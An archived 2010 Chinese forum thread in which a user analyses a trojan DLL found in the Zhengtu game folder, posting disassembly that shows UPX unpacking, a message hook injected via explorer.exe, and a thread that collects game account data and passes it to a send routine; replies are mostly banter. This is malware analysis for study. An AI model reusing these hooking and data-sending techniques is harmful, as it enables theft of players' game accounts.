分析一个征途木马的DLL文件

qiang 发表于 2010-7-16 11:03:36

本帖最后由 qiang 于 2010-7-16 11:06 编辑

文件: C:\program files上海巨人网络科技有限公司征途绿色版\data\ksuser.dll
大小: 12800 字节
修改时间: 2010年7月15日, 15:15:10
MD5: EA96A8D2897A77FA91A3890CFCAAA986
SHA1: E7BB56EFC9B648A4D0B5979A5BF0C6196B60F36B

先脱壳，一路按F8下去，到地址1000D92F返回到UPX壳起始点。1000D911 p>  66:8BC0          mov ax, ax
1000D914    53             push ebx
1000D915    60             pushad
1000D916    9C             pushfd
1000D917    EB 01          jmp short 1000D91A
1000D919    FF8B C0B90200    dec dword ptr
1000D91F    2300             and eax, dword ptr
1000D921    E8 0A000000    call 1000D930
1000D926    90             nop
1000D927    9D             popfd
1000D928    61             popad
1000D929    5B             pop ebx
1000D92A    68 E0FC0000    push 0FCE0
1000D92F    C3             retn1000D927       9D             popfd
1000D928       61             popad
1000D929       5B             pop ebx
1000D92A       68 40D70010    push 1000D740
1000D92F       C3             retn //返回到UPX壳起始点UPX壳脱掉，来到入口点：10004590       837C24 08 01    cmp dword ptr , 1
10004595       75 0E          jnz short 100045A5
10004597       8B4424 04       mov eax, dword ptr
1000459B       A3 D09C0010    mov dword ptr , eax
100045A0       E8 9BFEFFFF    call 10004440 //call 1
100045A5       B8 01000000    mov eax, 1
100045AA       C2 0C00          retn 0C进入call 110004440    /$  81EC 24090000 sub esp, 924                      ;  (Initial CPU selection)
10004446    |.  8D8424 24010000 lea eax, dword ptr
1000444D    |.  53             push ebx
1000444E    |.  8B1D 6C500010 mov ebx, dword ptr       ;  kernel32.GetModuleFileNameA
10004454    |.  56             push esi
10004455    |.  68 00080000    push 800                            ; /BufSize = 800 (2048.)
1000445A    |.  50             push eax                            ; |PathBuffer
1000445B    |.  6A 00          push 0                            ; |hModule = NULL
1000445D    |.  FFD3          call ebx                            ; \GetModuleFileNameA//获取当前进程名全路径
1000445F    |.  8D4C24 14    lea ecx, dword ptr
10004463    |.  8D9424 2C010000 lea edx, dword ptr
1000446A    |.  51             push ecx
1000446B    |.  52             push edx
1000446C    |.  E8 DFF5FFFF    call 10003A50 //这个函数获得进程名
10004471    |.  8B35 B0500010 mov esi, dword ptr       ;  kernel32.lstrcmpiA
10004477    |.  83C4 08       add esp, 8
1000447A    |.  8D4424 14    lea eax, dword ptr
1000447E    |.  68 BC650010    push 100065BC                      ; /explorer.exe
10004483    |.  50             push eax                            ; |String1
10004484    |.  FFD6          call esi                            ; \lstrcmpiA //explorer.exe和当前进程名比较
10004486    |.  85C0          test eax, eax
10004488    |.  0F85 A3000000 jnz 10004531 //不是explorer.exe调到地址10004531,是就往下走
1000448E    |.  57             push edi
1000448F    |.  E8 1CF9FFFF    call Hookon //设置WH_GETMESSAGE类型的消息钩子
10004494    |.  8B0D B0650010 mov ecx, dword ptr
1000449A    |.  8B15 B4650010 mov edx, dword ptr
100044A0    |.  A1 B8650010    mov eax, dword ptr
100044A5    |.  894C24 0C    mov dword ptr , ecx
100044A9    |.  895424 10    mov dword ptr , edx
100044AD    |.  894424 14    mov dword ptr , eax
100044B1    |.  E8 AAF6FFFF    call 10003B60
100044B6    |.  68 A0650010    push 100065A0                      ; /ztcztsjasdfgh
100044BB    |.  6A 00          push 0                            ; |InitialOwner = FALSE
100044BD    |.  6A 00          push 0                            ; |pSecurity = NULL
100044BF    |.  FF15 84500010 call dword ptr          ; \CreateMutexA
100044C5    |.  E8 96F6FFFF    call 10003B60
100044CA    |.  FF15 80500010 call dword ptr          ;  ntdll.RtlGetLastWin32Error
100044D0    |.  8D4C24 0C    lea ecx, dword ptr
100044D4    |.  51             push ecx                            ; /MappingName
100044D5    |.  6A 00          push 0                            ; |InheritHandle = FALSE
100044D7    |.  68 1F000F00    push 0F001F                         ; |Access = F001F
100044DC    |.  FF15 7C500010 call dword ptr          ; \OpenFileMappingA
100044E2    |.  6A 00          push 0                            ; /MapSize = 0
100044E4    |.  6A 00          push 0                            ; |OffsetLow = 0
100044E6    |.  8BF0          mov esi, eax                      ; |
100044E8    |.  6A 00          push 0                            ; |OffsetHigh = 0
100044EA    |.  68 1F000F00    push 0F001F                         ; |AccessMode = F001F
100044EF    |.  56             push esi                            ; |hMapObject
100044F0    |.  FF15 78500010 call dword ptr          ; \MapViewOfFile
100044F6    |.  8BF8          mov edi, eax
100044F8    |.  A1 A8A10010    mov eax, dword ptr
100044FD    |.  8D5424 2C    lea edx, dword ptr
10004501    |.  68 04010000    push 104
10004506    |.  52             push edx
10004507    |.  50             push eax
10004508    |.  FFD3          call ebx
1000450A    |.  8B0F          mov ecx, dword ptr
1000450C    |.  6A 00          push 0                            ; /lParam = 0
1000450E    |.  6A 00          push 0                            ; |wParam = 0
10004510    |.  6A 12          push 12                            ; |Message = WM_QUIT
10004512    |.  51             push ecx                            ; |ThreadId
10004513    |.  FF15 1C510010 call dword ptr          ; \PostThreadMessageA
10004519    |.  57             push edi                            ; /BaseAddress
1000451A    |.  FF15 74500010 call dword ptr          ; \UnmapViewOfFile
10004520    |.  56             push esi                            ; /hObject
10004521    |.  FF15 A4500010 call dword ptr          ; \CloseHandle
10004527    |.  5F             pop edi
10004528    |.  5E             pop esi
10004529    |.  5B             pop ebx
1000452A    |.  81C4 24090000 add esp, 924
10004530    |.  C3             retn
10004531    |>  8D5424 14    lea edx, dword ptr
10004535    |.  68 94650010    push 10006594                      ;  zhengtu.dat
1000453A    |.  52             push edx
1000453B    |.  FFD6          call esi                            ;  kernel32.lstrcmpiA//当前进程和zhengtu.dat比较
1000453D    |.  85C0          test eax, eax
1000453F    |.  75 41          jnz short 10004582
10004541    |.  E8 1AF6FFFF    call 10003B60
10004546    |.  8D8424 2C010000 lea eax, dword ptr
1000454D    |.  68 D08C0010    push 10008CD0
10004552    |.  50             push eax
10004553    |.  E8 38F5FFFF    call 10003A90
10004558    |.  83C4 08       add esp, 8
1000455B    |.  6A 00          push 0                            ; /lParam = 0
1000455D    |.  68 C0430010    push 100043C0                      ; |Callback = program_.100043C0
10004562    |.  FF15 08510010 call dword ptr          ; \EnumWindows
10004568    |.  6A 00          push 0                            ; /pThreadId = NULL
1000456A    |.  6A 00          push 0                            ; |CreationFlags = 0
1000456C    |.  6A 00          push 0                            ; |pThreadParm = NULL
1000456E    |.  68 00130010    push 10001300                      ; |ThreadFunction = program_.10001300//线程函数
10004573    |.  6A 00          push 0                            ; |StackSize = 0
10004575    |.  6A 00          push 0                            ; |pSecurity = NULL
10004577    |.  FF15 54500010 call dword ptr          ; \CreateThread//创建一个线程
1000457D    |.  E8 DEF5FFFF    call 10003B60
10004582    |>  5E             pop esi
10004583    |.  5B             pop ebx
10004584    |.  81C4 24090000 add esp, 924
1000458A    \.  C3             retn线程函数10001300    .  55             push ebp
10001301    .  8B2D B4500010 mov ebp, dword ptr       ;  kernel32.lstrcatA
10001307    .  56             push esi
10001308    .  8B35 B8500010 mov esi, dword ptr       ;  kernel32.lstrcpyA
1000130E    .  57             push edi
1000130F    .  8B3D BC500010 mov edi, dword ptr       ;  kernel32.lstrcmpA
10001315    >  68 10270000    push 2710                         ; /Timeout = 10000. ms
1000131A    .  FF15 C0500010 call dword ptr          ; \Sleep
10001320    .  A1 DC650010    mov eax, dword ptr
10001325    .  85C0          test eax, eax
10001327    .^ 74 EC          je short 10001315
10001329    .  A0 BC8C0010    mov al, byte ptr
1000132E    .  84C0          test al, al
10001330    .^ 74 E3          je short 10001315
10001332    .  E8 29280000    call <NNULL>
10001337    .  E8 44020000    call 10001580                      ; // call 2函数获取游戏信息，并发送
1000133C    .  85C0          test eax, eax进入call 210001580    /$  B8 10110000    mov eax, 1110
10001585    |.  E8 76300000    call 10004600
1000158A    |.  53             push ebx
1000158B    |.  55             push ebp
1000158C    |.  56             push esi
1000158D    |.  33DB          xor ebx, ebx
1000158F    |.  57             push edi
10001590    |.  891D E4650010 mov dword ptr , ebx
10001596    |.  891D E0650010 mov dword ptr , ebx
1000159C    |.  E8 BF250000    call <NNULL>
100015A1    |.  33C0          xor eax, eax
100015A3    |.  8D4C24 10    lea ecx, dword ptr
100015A7    |.  894424 10    mov dword ptr , eax
100015AB    |.  51             push ecx
100015AC    |.  894424 18    mov dword ptr , eax
100015B0    |.  894424 1C    mov dword ptr , eax
100015B4    |.  894424 20    mov dword ptr , eax
100015B8    |.  FF15 A8500010 call dword ptr          ; [GetTickCount
100015BE    |.  50             push eax
100015BF    |.  E8 3C1C0000    call 10003200
100015C4    |.  8B2D B8500010 mov ebp, dword ptr       ;  kernel32.lstrcpyA
100015CA    |.  83C4 08       add esp, 8
100015CD    |.  B9 40000000    mov ecx, 40
100015D2    |.  33C0          xor eax, eax
100015D4    |.  8D7C24 20    lea edi, dword ptr
100015D8    |.  8D5424 20    lea edx, dword ptr
100015DC    |.  68 127F0010    push 10007F12                      ; /String2 = ""
100015E1    |.  52             push edx                            ; |String1
100015E2    |.  F3:AB          rep stos dword ptr es:       ; |
100015E4    |.  FFD5          call ebp                            ; \lstrcpyA
100015E6    |.  8B35 B4500010 mov esi, dword ptr       ;  kernel32.lstrcatA
100015EC    |.  8D4424 20    lea eax, dword ptr
100015F0    |.  68 98600010    push 10006098                      ; /?u=\r\n
100015F5    |.  50             push eax                            ; |ConcatString
100015F6    |.  FFD6          call esi                            ; \lstrcatA
100015F8    |.  8D4C24 20    lea ecx, dword ptr
100015FC    |.  68 BC8C0010    push 10008CBC                      ; /StringToAdd = ""
10001601    |.  51             push ecx                            ; |ConcatString
10001602    |.  FFD6          call esi                            ; \lstrcatA
10001604    |.  8D5424 20    lea edx, dword ptr
10001608    |.  68 94600010    push 10006094                      ; /&t=?u=\r\n
1000160D    |.  52             push edx                            ; |ConcatString
1000160E    |.  FFD6          call esi                            ; \lstrcatA
10001610    |.  8D4424 10    lea eax, dword ptr
10001614    |.  8D4C24 20    lea ecx, dword ptr
10001618    |.  50             push eax                            ; /StringToAdd
10001619    |.  51             push ecx                            ; |ConcatString
1000161A    |.  FFD6          call esi                            ; \lstrcatA
1000161C    |.  B9 00040000    mov ecx, 400
10001621    |.  33C0          xor eax, eax
10001623    |.  8DBC24 20010000 lea edi, dword ptr
1000162A    |.  33D2          xor edx, edx
1000162C    |.  F3:AB          rep stos dword ptr es:
1000162E    |.  8915 A88C0010 mov dword ptr , edx
10001634    |.  A3 10890010    mov dword ptr , eax
10001639    |.  8915 AC8C0010 mov dword ptr , edx
1000163F    |.  A3 14890010    mov dword ptr , eax
10001644    |.  33C9          xor ecx, ecx
10001646    |.  8915 B08C0010 mov dword ptr , edx
1000164C    |.  A3 18890010    mov dword ptr , eax
10001651    |.  890D AC870010 mov dword ptr , ecx
10001657    |.  8915 B48C0010 mov dword ptr , edx
1000165D    |.  A3 1C890010    mov dword ptr , eax
10001662    |.  890D B0870010 mov dword ptr , ecx
10001668    |.  891D E0650010 mov dword ptr , ebx
1000166E    |.  8915 B88C0010 mov dword ptr , edx
10001674    |.  A3 20890010    mov dword ptr , eax
10001679    |.  66:890D B487001>mov word ptr , cx
10001680    |.  E8 DB240000    call <NNULL>
10001685    |.  8D9424 20010000 lea edx, dword ptr
1000168C    |.  8D4424 20    lea eax, dword ptr
10001690    |.  52             push edx
10001691    |.  50             push eax
10001692    |.  E8 C9FDFFFF    call 10001460                      ;  发信函数只有一个DLL文件，分析了其大体流程，还请大家多多建议和指教。
解压密码ggsafe

寂寞的季节 发表于 2010-7-16 11:50:24

...打我PG我不乖...啊

john 发表于 2010-7-16 13:37:24

继续努力。。
关键位置还没详细分析

Bodhi 发表于 2010-7-16 13:41:05

怎么分析的啊，期待楼主分析教程！

xxz 发表于 2010-7-16 14:08:21

LZ好WS的。。。

qiang 发表于 2010-7-16 14:43:02

回复 5# xxz

请教WS是何意？

cxcxs 发表于 2010-7-16 14:51:46

回复 xxz

请教WS是何意？
qiang 发表于 2010-7-16 14:43 http://www.unpack.cn/images/common/back.gif

猥琐

xxz 发表于 2010-7-16 16:11:00

同上解~~:lol

毛厘头 发表于 2010-7-16 17:14:36

水平有限，。，不太懂

xie83544109 发表于 2010-7-17 08:55:18

{:3_99:}
多谢大大地文章。。。

bianfeng 发表于 2010-7-17 14:59:36

本帖最后由 bianfeng 于 2010-7-17 15:31 编辑

http://www.unpack.cn/ucenter/avatar.php?uid=53376&size=middle
PLMM

electric009 发表于 2010-7-17 23:44:09

基本上没分析只是把反汇编工具的代码摆上来而已看看bianfeng大侠的木马分析

qiang 发表于 2010-7-19 17:44:34

本帖最后由 qiang 于 2010-7-19 17:48 编辑

回复 8# xxz

你太有才了，这都能想到。兄台回复太WS了。

qiang 发表于 2010-7-19 17:46:07

本帖最后由 qiang 于 2010-7-19 18:01 编辑

回复 12# electric009

这个是一个DLL文件，有些地方分析还需要完善分析。

xxz 发表于 2010-7-19 18:31:20

回复 13# qiang

兄台也不是一样WS？？彼此彼此~~:lol

页: [1] 2

一蓑烟雨论坛's Archiver

分析一个征途木马的DLL文件